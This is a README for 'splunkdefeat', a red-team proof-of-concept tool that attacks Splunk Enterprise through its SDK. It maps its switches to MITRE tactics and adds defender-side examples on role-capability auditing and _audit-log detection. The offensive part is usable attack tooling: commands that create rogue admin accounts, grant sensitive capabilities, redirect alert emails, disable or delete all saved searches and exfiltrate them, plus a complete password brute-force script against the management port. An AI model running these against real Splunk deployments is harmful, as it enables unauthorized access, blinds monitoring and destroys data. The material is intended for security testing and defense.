About splunkdefeat

splunkdefeat is a wrapper around the Splunk Enterprise SDK for Python that lets red teamers run multiple attack techniques against Splunk from one command-line tool. The motivation for this proof-of-concept tool was to illustrate practical attacks against Splunk, the risks they carry, and how defenders can implement countermeasures. The author assumes no liability for use of this tool.

A more detailed write-up can be found here: splunkdefeat — A Splunk SDK wrapper for red teams

Installation

Clone the repository:

```bash
git clone git@github.com:markernest0/splunkdefeat.git
```

Python Dependencies

splunkdefeat depends on the python-dotenv, prettytable and splunk-sdk Python modules.

Install the Python dependencies:

```bash
pip install -r requirements.txt
```

Usage

| Short Form | Long Form | Description | Tactic | Technique | Sub-Technique |
|---|---|---|---|---|---|
| -h | --help | Show this help message and exit | - | - | - |
| -au | --add_user | Enter the username to create | Persistence | Create Account | Cloud Account |
| -ap | --assign_password | Enter the password of the new user | Persistence | Create Account | Cloud Account |
| -ar | --assign_role | Specify the role of the new user (default is admin). Choices: {admin, power, user} | Persistence | Create Account | Cloud Account |
| -ur | --update_role | Specify the role to update with a capability. Choices: {admin, power, user} | Persistence | Account Manipulation | Additional Cloud Roles |
| -uc | --update_capability | Specify the capability to add to a role. Choices: {admin_all_objects, schedule_search, edit_user, delete_by_keyword, all} | Persistence | Account Manipulation | Additional Cloud Roles |
| -ue | --update_email | Enter the new email address for alerts | Defense Evasion | Impair Defenses | Disable or Modify Tools |
| -ds | --disable_searches | Disable all searches | Defense Evasion | Impair Defenses | Disable or Modify Tools |
| -es | --enable_searches | Enable all searches | Defense Evasion | Impair Defenses | Disable or Modify Tools |
| -sh | --splunk_host | Domain name or IP address to enumerate | Credential Access | Brute Force | - |
| -sp | --splunk_port | Connect to the host on this TCP port (default: 8089) | Credential Access | Brute Force | - |
| -su | --splunk_user | Specify the username | Credential Access | Brute Force | - |
| -sf | --password_file | Specify the use of a password file | Credential Access | Brute Force | - |
| -lu | --list_user | List the current user | Discovery | Account Discovery | Cloud Account |
| -la | --list_all | List all users | Discovery | Account Discovery | Cloud Account |
| -lr | --list_roles | List all roles | Discovery | Permission Groups Discovery | Cloud Groups |
| -ls | --list_searches | List all searches | Discovery | Cloud Service Discovery | - |
| -ss | --save_searches | Save all searches locally | Exfiltration | Automated Exfiltration | - |
| -du | --delete_user | Delete a specific user | Impact | Account Access Removal | - |
| -rs | --delete_searches | Delete all searches | Impact | Data Destruction | - |
| -ms | --manipulate_searches | Manipulate all searches | Impact | Stored Data Manipulation | - |

Examples

  • To list all the options and switches, use the -h switch:

```bash
python splunkdefeat.py -h
```

PERSISTENCE

  • Create a new user with the -au, -ap, and -ar switches:

```bash
python splunkdefeat.py -au splunk-replicate -ap mypassword123 -ar admin
```

  • Modify a role with an additional capability (here, delete_by_keyword on the admin role):

```bash
python splunkdefeat.py -ur admin -uc delete_by_keyword
```

DEFENSE EVASION

  • Update the email address for all search alert actions:

```bash
python splunkdefeat.py -ue [email protected]
```

  • Disable all searches:

```bash
python splunkdefeat.py -ds
```

  • Enable all searches:

```bash
python splunkdefeat.py -es
```

CREDENTIAL ACCESS

  • Brute-force a user's password against the management port (8089 by default) using a password file:

```bash
python splunkdefeat.py -sh splunk.example.com -sp 8089 -su sc_admin -sf
```
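The brute-force switch above drives the same Splunk REST login that the SDK uses under the hood. The following is an added example (not splunkdefeat's own code) that shows that exchange directly with the standard library: a form-encoded POST to `/services/auth/login` on the management port, a `sessionKey` parsed out of the XML reply on success, and a 401 treated as "wrong password". The transport is injectable so the loop can be exercised offline; the host, user and password list in the usage line are placeholders.

```python
"""Password guessing against Splunk's management port via POST /services/auth/login.
Added example (not splunkdefeat's code). Use only against systems you are authorized to test."""
import ssl
import sys
import time
import urllib.error
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

LOGIN_PATH = "/services/auth/login"


def login_request(host, port, username, password):
    """Splunk's login endpoint takes a form-encoded username/password POST."""
    url = f"https://{host}:{port}{LOGIN_PATH}"
    body = urllib.parse.urlencode({"username": username, "password": password}).encode()
    return url, body


def session_key_from_response(xml_bytes):
    """A successful login answers <response><sessionKey>...</sessionKey></response>."""
    node = ET.fromstring(xml_bytes).find("sessionKey")
    return node.text if node is not None else None


def https_post(url, body, verify=False):
    """Default transport: returns (status, body). A 401 is Splunk's normal 'Login failed' reply."""
    ctx = ssl.create_default_context()
    if not verify:  # Splunk ships a self-signed cert on 8089; pass verify=True once you trust the CA
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(url, data=body, method="POST")
    try:
        with urllib.request.urlopen(req, context=ctx, timeout=10) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def brute_force(host, port, username, passwords, post=https_post, delay=0.0):
    """Try each candidate; return (password, session_key) on the first hit, None if none work.
    Any status other than 200/401 aborts the run so that a lockout, a WAF block or a
    misrouted request is not silently counted as 'wrong password'."""
    for pw in passwords:
        url, body = login_request(host, port, username, pw)
        status, data = post(url, body)
        if status == 200:
            return pw, session_key_from_response(data)
        if status != 401:
            raise RuntimeError(f"unexpected HTTP {status} while testing {username!r}; stopping")
        time.sleep(delay)
    return None


if __name__ == "__main__":
    # usage: python splunk_login_bf.py splunk.example.com sc_admin passwords.txt  (placeholders)
    host, user, wordlist = sys.argv[1], sys.argv[2], sys.argv[3]
    with open(wordlist, encoding="utf-8") as fh:
        candidates = [line.rstrip("\n") for line in fh if line.strip()]
    print(brute_force(host, 8089, user, candidates, delay=0.5))
```

Two defender-side points follow from this loop: every attempt, successful or not, is recorded in Splunk's `_audit` index, so a burst of failures against one account from one client address is a cheap detection; and Splunk Enterprise can lock accounts after repeated failures (the lockout settings in authentication.conf), which is why the example aborts on any unexpected status instead of burning through the whole list. Keep port 8089 off untrusted networks in the first place.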

DISCOVERY

  • List the current user and role:

```bash
python splunkdefeat.py -lu
```

  • List all users and roles:

```bash
python splunkdefeat.py -la
```

  • List all roles and capabilities:

```bash
python splunkdefeat.py -lr
```

  • List all searches:

```bash
python splunkdefeat.py -ls
```
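The -la and -lr listings show users, roles and capabilities as separate views. What an operator (or a defender reviewing the same output) usually wants is the combined picture: which users end up holding a sensitive capability, including capabilities inherited through `imported_roles`. The following is an added example, not part of splunkdefeat, that resolves that from the JSON shape returned by the roles and users endpoints (`output_mode=json`). The role and user data is constructed for this example and only the fields used here are included.

```python
"""Resolve which Splunk users effectively hold sensitive capabilities, including ones
inherited through imported roles. Added example; constructed sample data."""
import json

# Constructed samples shaped like the JSON from
#   GET /services/authorization/roles?output_mode=json
#   GET /services/authentication/users?output_mode=json
# trimmed to the fields used below. Names and assignments are made up for this example.
SAMPLE_ROLES = json.dumps({"entry": [
    {"name": "user", "content": {"capabilities": ["search", "list_settings"], "imported_roles": []}},
    {"name": "power", "content": {"capabilities": ["schedule_search", "rtsearch"], "imported_roles": ["user"]}},
    {"name": "admin", "content": {"capabilities": ["admin_all_objects", "edit_user", "delete_by_keyword"],
                                  "imported_roles": ["power"]}},
    {"name": "helpdesk", "content": {"capabilities": [], "imported_roles": ["power"]}},
]})
SAMPLE_USERS = json.dumps({"entry": [
    {"name": "admin", "content": {"roles": ["admin"]}},
    {"name": "splunk-replicate", "content": {"roles": ["admin"]}},  # the account created in the -au example
    {"name": "alice", "content": {"roles": ["user"]}},
    {"name": "bob", "content": {"roles": ["helpdesk"]}},
]})

# The capabilities splunkdefeat's -uc switch can grant; each lets a holder escalate or tamper.
SENSITIVE_CAPS = {"admin_all_objects", "edit_user", "delete_by_keyword", "schedule_search"}


def load_entries(text):
    """Map entry name -> content dict; works for both endpoints' JSON."""
    return {e["name"]: e["content"] for e in json.loads(text)["entry"]}


def effective_capabilities(roles, role, _seen=None):
    """Union a role's own capabilities with those of every role it imports (cycle-safe)."""
    seen = _seen if _seen is not None else set()
    if role in seen or role not in roles:
        return set()
    seen.add(role)
    caps = set(roles[role].get("capabilities", []))
    for parent in roles[role].get("imported_roles", []):
        caps |= effective_capabilities(roles, parent, seen)
    return caps


def sensitive_by_role(roles_json):
    """role name -> sorted list of sensitive capabilities it effectively carries."""
    roles = load_entries(roles_json)
    return {name: sorted(effective_capabilities(roles, name) & SENSITIVE_CAPS) for name in roles}


def users_with_capability(users_json, roles_json, cap):
    """Every user who holds `cap` directly or through role inheritance."""
    roles = load_entries(roles_json)
    users = load_entries(users_json)
    return sorted(u for u, c in users.items()
                  if any(cap in effective_capabilities(roles, r) for r in c.get("roles", [])))


if __name__ == "__main__":
    for role, caps in sensitive_by_role(SAMPLE_ROLES).items():
        print(f"{role:10s} {caps}")
    print("delete_by_keyword:", users_with_capability(SAMPLE_USERS, SAMPLE_ROLES, "delete_by_keyword"))
```

Note that the `helpdesk` role carries no capabilities of its own yet still confers schedule_search through `power`, which is exactly the kind of inherited grant a per-role listing hides. Splunk also reports an `imported_capabilities` field on each role; comparing it with the walk above is a useful cross-check when auditing a real deployment.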

EXFILTRATION

  • Download all saved searches locally:

```bash
python splunkdefeat.py -ss
```

IMPACT

  • Delete a user:

```bash
python splunkdefeat.py -du user_a
```

  • Delete all searches:

```bash
python splunkdefeat.py -rs
```

  • Manipulate all searches:

```bash
python splunkdefeat.py -ms
```
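Every action in the table above (the login attempts behind -sf, the account created by -au, the capability granted by -uc, and the bulk saved-search changes made by -ds, -ue, -rs and -ms) is written by Splunk itself to its `_audit` index, which is where the countermeasures mentioned in the introduction start. The following is an added, defender-side example that is not part of splunkdefeat: it parses audit events and raises findings for a failed-login burst, a new admin account, a sensitive capability grant, and a user touching many saved searches in a short window. The sample lines are constructed for this example in a simplified version of Splunk's `Audit:[key=value, ...]` layout; the `action` and `info` values are assumptions, so map them to the field values your own deployment logs before relying on the rules.

```python
"""Flag splunkdefeat-style activity in Splunk _audit events. Added example; constructed sample data."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in a simplified Audit:[k=v, k=v, ...] layout. The action/info values
# below are assumptions for this example; check them against your own audit.log.
SAMPLE_AUDIT = """\
Audit:[timestamp=03-01-2024 10:00:01.000, user=sc_admin, action=login attempt, info=failed, clientip=10.1.1.5]
Audit:[timestamp=03-01-2024 10:00:02.000, user=sc_admin, action=login attempt, info=failed, clientip=10.1.1.5]
Audit:[timestamp=03-01-2024 10:00:03.000, user=sc_admin, action=login attempt, info=failed, clientip=10.1.1.5]
Audit:[timestamp=03-01-2024 10:00:04.000, user=sc_admin, action=login attempt, info=failed, clientip=10.1.1.5]
Audit:[timestamp=03-01-2024 10:00:05.000, user=sc_admin, action=login attempt, info=failed, clientip=10.1.1.5]
Audit:[timestamp=03-01-2024 10:00:06.000, user=sc_admin, action=login attempt, info=succeeded, clientip=10.1.1.5]
Audit:[timestamp=03-01-2024 10:00:20.000, user=sc_admin, action=edit_user, info=created, object=splunk-replicate, roles=admin]
Audit:[timestamp=03-01-2024 10:00:25.000, user=sc_admin, action=edit_roles, info=granted, object=admin, capabilities=delete_by_keyword]
Audit:[timestamp=03-01-2024 10:01:00.000, user=sc_admin, action=edit_search, info=disabled, object=Failed logins]
Audit:[timestamp=03-01-2024 10:01:00.500, user=sc_admin, action=edit_search, info=disabled, object=New admin user]
Audit:[timestamp=03-01-2024 10:01:01.000, user=sc_admin, action=edit_search, info=disabled, object=Role change]
Audit:[timestamp=03-01-2024 10:01:01.500, user=sc_admin, action=edit_search, info=disabled, object=Outbound beacon]
Audit:[timestamp=03-01-2024 11:30:00.000, user=alice, action=login attempt, info=failed, clientip=10.2.2.9]
Audit:[timestamp=03-01-2024 11:30:30.000, user=alice, action=login attempt, info=succeeded, clientip=10.2.2.9]
"""

# The capabilities splunkdefeat's -uc switch can grant.
SENSITIVE_CAPS = {"admin_all_objects", "edit_user", "delete_by_keyword", "schedule_search"}
TS_FMT = "%m-%d-%Y %H:%M:%S.%f"
EVENT_RE = re.compile(r"Audit:\[(.*)\]$")


def parse_audit(text):
    """Turn each Audit:[...] line into a dict of its key=value fields plus a parsed 'ts'."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.search(line.strip())
        if not m:
            continue
        fields = {}
        for pair in m.group(1).split(", "):
            key, _, value = pair.partition("=")
            fields[key.strip()] = value.strip()
        fields["ts"] = datetime.strptime(fields["timestamp"], TS_FMT)
        events.append(fields)
    return events


def detect(events, fail_threshold=5, window=timedelta(minutes=2), mass_threshold=3):
    """Return (finding, subject) pairs in time order. Each threshold rule fires once per burst."""
    findings = []
    fails = defaultdict(list)         # (clientip, user) -> failure timestamps inside the window
    search_edits = defaultdict(list)  # user -> saved-search change timestamps inside the window
    for ev in sorted(events, key=lambda e: e["ts"]):
        action, info = ev.get("action"), ev.get("info")
        if action == "login attempt" and info == "failed":
            key = (ev.get("clientip"), ev.get("user"))
            hits = [t for t in fails[key] if ev["ts"] - t <= window] + [ev["ts"]]
            fails[key] = hits
            if len(hits) == fail_threshold:
                findings.append(("brute_force", f"{key[1]} from {key[0]}"))
        elif action == "edit_user" and info == "created":
            kind = "new_admin_user" if "admin" in ev.get("roles", "").split(",") else "new_user"
            findings.append((kind, ev.get("object")))
        elif action == "edit_roles" and info == "granted":
            risky = sorted(set(ev.get("capabilities", "").split(",")) & SENSITIVE_CAPS)
            if risky:
                findings.append(("sensitive_capability", f"{ev.get('object')}:{','.join(risky)}"))
        elif action == "edit_search" and info in {"disabled", "deleted", "updated"}:
            user = ev.get("user")
            hits = [t for t in search_edits[user] if ev["ts"] - t <= window] + [ev["ts"]]
            search_edits[user] = hits
            if len(hits) == mass_threshold:
                findings.append(("mass_search_change", user))
    return findings


if __name__ == "__main__":
    for kind, subject in detect(parse_audit(SAMPLE_AUDIT)):
        print(f"{kind:22s} {subject}")
```

The mass-change rule is the one worth tuning most carefully: a single `-ds`, `-ue`, `-rs` or `-ms` run touches every saved search within seconds, which is far outside what an analyst editing searches by hand produces, so a low threshold over a short window catches it without much noise. Alice's lone failed login does not trip the brute-force rule, which is the intended behaviour.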